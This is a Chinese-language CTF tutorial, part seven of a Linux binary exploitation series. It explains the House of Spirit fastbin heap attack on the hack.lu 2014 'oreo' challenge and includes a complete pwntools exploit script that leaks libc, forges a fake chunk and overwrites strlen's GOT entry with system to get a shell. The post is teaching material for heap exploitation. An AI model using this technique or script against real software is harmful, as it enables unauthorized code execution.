Linux 二进制漏洞挖掘入门系列之(七)堆溢出: House of Spirit

2024-01-22 21:38

本文主要是介绍Linux 二进制漏洞挖掘入门系列之(七)堆溢出: House of Spirit,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

0x10 基础知识

关于 bin 的一些特点

  • malloc 返回值,指向 chunk 的 user data

  • 每个 bin 采取 LIFO 策略,最近被释放的 chunk 优先被再次使用

关于 fastbin 的一些特点

案例

int main(void)
{void *chunk1,*chunk2,*chunk3;chunk1=malloc(0x30);chunk2=malloc(0x30);chunk3=malloc(0x30);//进行释放free(chunk1);free(chunk2);free(chunk3);return 0;
}

第一次 free

fastbin(fd) -> chunk1

第二次 free

fastbin(fd) -> chunk2 -> chunk1 

全部释放后,chunk1、chunk2、chunk3 数据结构中的 fd 指针(指向下一个相邻 chunk)如下

fastbin(fd) -> chunk3 -> chunk2 -> chunk1

fastbin 中的 chunk 并没有使用 bk,这也从侧面说明 fastbin 使用单链表来维护和释放堆块的。且 fastbin 中的 next chunk 的 previous chunk 位不会被清空

0x20 2014 hack.lu oreo

题目链接

0x21 程序分析

简单分析,运行程序并结合反编译的代码

  1. Add new rifle

    sub_8048644(),添加一把枪,用户输入的 name 存在堆溢出,可以覆盖下一个 chunkdesc       name          previous┌──────────┬──────────────┬──┐│          │              │  │└──────────┴──────────────┴──┘
    addr       +25            +52转换成结构体,其实就是
    struct Rifle{char desc[25];char name[27];char *previous;
    }
    
  2. Show added rifles

    sub_8048729(),打印所有添加的抢的名字和描述(倒叙)
    
  3. Order selected rifles

    sub_8048810(),循环释放步骤1 每一个申请的 chunk
    
  4. Leave a Message with your Order

    sub_80487B4(), 将输入的消息存放至全局变量 dword_804A2A8,而该变量指向的地址空间就是相邻的下一个存储空间.bss:0804A2A8 dword_804A2A8   dd ?                    ; DATA XREF: sub_80487B4+23↑r
    .bss:0804A2A8                                         ; sub_80487B4+3C↑r ...
    .bss:0804A2AC                 align 20h
    .bss:0804A2C0 unk_804A2C0     db    ? ;               ; DATA XREF: main+29↑o
    .bss:0804A2C1                 db    ? ;
    .bss:0804A2C2                 db    ? ;
    .bss:0804A2C3                 db    ? ;
    
  5. Show current stats

    sub_8048906(),打印 rifle 的 count/order_count/word_804A2A8,即数量、订购数量、订购留言
    
  6. Exit!

很明显,add_rifle 申请的 chunk 存在溢出,chunk 的地址又可以被覆盖,且会被 select_rifle 释放。因此可以实现释放任意地址空间,这个地址空间就是我们需要伪造的 fastbin chunk。释放伪造的 chunk,这就是 House of Spirit 的核心。释放之后再次申请相同大小的内存,那么就会分配想要的地址。

根据 free 函数的源码,伪造的 chunk 应该满足以下条件,才会被放入 fastbin

  • ISMMAP 位不能为 1,即不能使 mmap 函数申请的内存,否则会被单独处理
  • 地址对齐,这是基本要求
  • 大小在 fastbin 范围之内
  • fake chunk 对应的 fastbin 链表头部不能是该 fake chunk,即不能构成 double free
  • 下一个 chunk 的 size 在 bin 上

House of Spirit 的目标是实现任意地址写

0x22 漏洞利用

1 控制 rifle->previous,泄露 libc

需要注意的两点

  • 在这个程序中,没有使用 setvbuf 设置输出缓冲,在遇到 printf 打印没有 '\n’的字符串时,可能不会输出到终端
  • 注意偏移的计算,previous 指针的偏移,IDA 反编译的代码 *((_DWORD *)rifle + 13) = v1; 应该是 13 * 4 = 0x34,这一点从汇编代码也能看出来 mov [eax+34h], edx
# 1.leak libc
add_rifle(b'a' * 27 + p32(pwn_elf.got["printf"]), b'b' * 25)
show_rifle()
io.recvuntil(b"===================================\n")
io.recvuntil(b"===================================\n")
io.recvuntil(b"Description: ")
printf_addr = u32(io.recv(4))
print("printf_addr: " + hex(printf_addr))
libc_base = printf_addr - libc_elf.sym["printf"]
print("libc_base: " + hex(libc_base))

2 伪造 chunk,实现任意地址写

dword_804A2A8 = (char *)&unk_804A2C0;,这是选项 4 能够写入的用户订单留言信息,如果我们能够控制 dword_804A2A8 的值,就可以实现任意地址写

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Sa3bUfkd-1625744375664)(fake_chunk_addr.png)]

所以现在的思路就是利用堆溢出,修改 previous 指针,指向 0x0804A2A8(地址刚好已经对齐),这个地址就是我们需要伪造的 chunk。

对于 fake chunk 的布局,以绕过 free 函数的检查

  • fake chunk size = count,为了和 malloc(0x38) 保持一致可以设置为 0x41(也可以设置成其他值,当然大小要在 fastbin 范围内,且最后一位为 1)

    add_file() 一共运行 0x41 次即可

  • 下一个 chunk size 的 IN_USE = 1

    需要计算偏移量,这里注意偏移:0x0804A2A8 + (0x40 - 0x8 + 0x4) - 0x0804A2C0,刚好没有使用 chunk 的空间复用!

  • fake chunk 的 previous 应该指向 Null,否则会继续 free 一个不存在的地址空间

    *(0x0804A2A8 + 0x34 - 0x0804A2C0) = 0x00

代码如下

# house of spirit
for i in range(0x41 - 0x2):add_rifle(b'a', b'b')add_rifle(b'a' * 27 + p32(0x0804A2A8), b'b' * 25)offset = 0x0804A2A8 + (0x40 - 0x8 + 0x4) - 0x0804A2C0
leave_msg(b'\x00' * offset + p32(0x41))	# \x00 是为了满足 fake chunk 没有后续的 chunk!
order_rifle()							# free
add_rifle()								# malloc,实现任意地址写
leave_msg()

3 覆盖 GOT 表

got.plt 节有几个函数,选择的函数应该符合入参可控

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8NryBnnU-1625744375666)(got.png)]

我们发现 strlen() 刚好是 leave_msg() 的 msg,因此,在修改 got 表同时,也传入了入参

add_rifle(b'a', p32(pwn_elf.got["strlen"]))			# malloc
leave_msg(p32(libc_elf.sym["system"]) + b";/bin/sh")

相当于执行了 system(p32(libc_elf.sym["system"]), ';/bin/sh')

0x30 总结

本次例题漏洞点在于堆溢出可修改 chunk 地址,实现 free 任意地址的 chunk(前提是这个地址的前后部分我们能够控制,达到 free 检查),这样再次申请,可以得到我们伪造的 chunk。fake chunk 的空间指向的地址,如果能够被修改,即可实现任意地址写。

堆的利用方式千变万化,House of Spirit 只是其中的一种(Fastbin attack),通过伪造的 fake chunk,可以实现任意地址写的目的,进而覆盖 GOT 表的函数地址。

exp

from pwn import *def add_rifle(name, desc):io.sendline(b"1")io.sendline(name)io.sendline(desc)def show_rifle():io.sendline(b"2")def order_rifle():io.sendline(b"3")def leave_msg(msg):io.sendline(b"4")io.sendline(msg)context(log_level="debug", os="Linux", arch="i386")
pwn_elf = ELF("./oreo")
libc_elf = ELF("/lib32/libc.so.6")
io = process("./oreo")
gdb.attach(io, "b free")
io.recv()# 1.leak libc
add_rifle(b'a' * 27 + p32(pwn_elf.got["printf"]), b'b' * 25)
show_rifle()
io.recvuntil(b"===================================\n")
io.recvuntil(b"===================================\n")
io.recvuntil(b"Description: ")
printf_addr = u32(io.recv(4))
print("printf_addr: " + hex(printf_addr))
libc_base = printf_addr - libc_elf.sym["printf"]
print("libc_base: " + hex(libc_base))# house of spirit
for i in range(0x41 - 0x2):add_rifle(b'a', b'b')
add_rifle(b'a' * 27 + p32(0x0804A2A8), b'b' * 25)# fake chunk
offset = 0x0804A2A8 + (0x40 - 0x8 + 0x4) - 0x0804A2C0
leave_msg(b'\x00' * offset + p32(0x41))
order_rifle()		# free
#io.recv()# GOT
add_rifle(b'a', p32(pwn_elf.got["strlen"]))			# mallocleave_msg(p32(libc_base + libc_elf.sym["system"]) + b";/bin/sh")
io.recv()
io.interactive()

这篇关于Linux 二进制漏洞挖掘入门系列之(七)堆溢出: House of Spirit的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/634319

相关文章

MySQL DQL从入门到精通

《MySQLDQL从入门到精通》通过DQL,我们可以从数据库中检索出所需的数据,进行各种复杂的数据分析和处理,本文将深入探讨MySQLDQL的各个方面,帮助你全面掌握这一重要技能,感兴趣的朋友跟随小... 目录一、DQL 基础:SELECT 语句入门二、数据过滤:WHERE 子句的使用三、结果排序:ORDE

基于Linux的ffmpeg python的关键帧抽取

《基于Linux的ffmpegpython的关键帧抽取》本文主要介绍了基于Linux的ffmpegpython的关键帧抽取,实现以按帧或时间间隔抽取关键帧,文中通过示例代码介绍的非常详细,对大家的学... 目录1.FFmpeg的环境配置1) 创建一个虚拟环境envjavascript2) ffmpeg-py

Linux脚本(shell)的使用方式

《Linux脚本(shell)的使用方式》:本文主要介绍Linux脚本(shell)的使用方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录概述语法详解数学运算表达式Shell变量变量分类环境变量Shell内部变量自定义变量:定义、赋值自定义变量:引用、修改、删

Linux链表操作方式

《Linux链表操作方式》:本文主要介绍Linux链表操作方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、链表基础概念与内核链表优势二、内核链表结构与宏解析三、内核链表的优点四、用户态链表示例五、双向循环链表在内核中的实现优势六、典型应用场景七、调试技巧与

详解Linux中常见环境变量的特点与设置

《详解Linux中常见环境变量的特点与设置》环境变量是操作系统和用户设置的一些动态键值对,为运行的程序提供配置信息,理解环境变量对于系统管理、软件开发都很重要,下面小编就为大家详细介绍一下吧... 目录前言一、环境变量的概念二、常见的环境变量三、环境变量特点及其相关指令3.1 环境变量的全局性3.2、环境变

Linux系统中的firewall-offline-cmd详解(收藏版)

《Linux系统中的firewall-offline-cmd详解(收藏版)》firewall-offline-cmd是firewalld的一个命令行工具,专门设计用于在没有运行firewalld服务的... 目录主要用途基本语法选项1. 状态管理2. 区域管理3. 服务管理4. 端口管理5. ICMP 阻断

Linux实现线程同步的多种方式汇总

《Linux实现线程同步的多种方式汇总》本文详细介绍了Linux下线程同步的多种方法,包括互斥锁、自旋锁、信号量以及它们的使用示例,通过这些同步机制,可以解决线程安全问题,防止资源竞争导致的错误,示例... 目录什么是线程同步?一、互斥锁(单人洗手间规则)适用场景:特点:二、条件变量(咖啡厅取餐系统)工作流

Linux中修改Apache HTTP Server(httpd)默认端口的完整指南

《Linux中修改ApacheHTTPServer(httpd)默认端口的完整指南》ApacheHTTPServer(简称httpd)是Linux系统中最常用的Web服务器之一,本文将详细介绍如何... 目录一、修改 httpd 默认端口的步骤1. 查找 httpd 配置文件路径2. 编辑配置文件3. 保存

Linux使用scp进行远程目录文件复制的详细步骤和示例

《Linux使用scp进行远程目录文件复制的详细步骤和示例》在Linux系统中,scp(安全复制协议)是一个使用SSH(安全外壳协议)进行文件和目录安全传输的命令,它允许在远程主机之间复制文件和目录,... 目录1. 什么是scp?2. 语法3. 示例示例 1: 复制本地目录到远程主机示例 2: 复制远程主

Python中文件读取操作漏洞深度解析与防护指南

《Python中文件读取操作漏洞深度解析与防护指南》在Web应用开发中,文件操作是最基础也最危险的功能之一,这篇文章将全面剖析Python环境中常见的文件读取漏洞类型,成因及防护方案,感兴趣的小伙伴可... 目录引言一、静态资源处理中的路径穿越漏洞1.1 典型漏洞场景1.2 os.path.join()的陷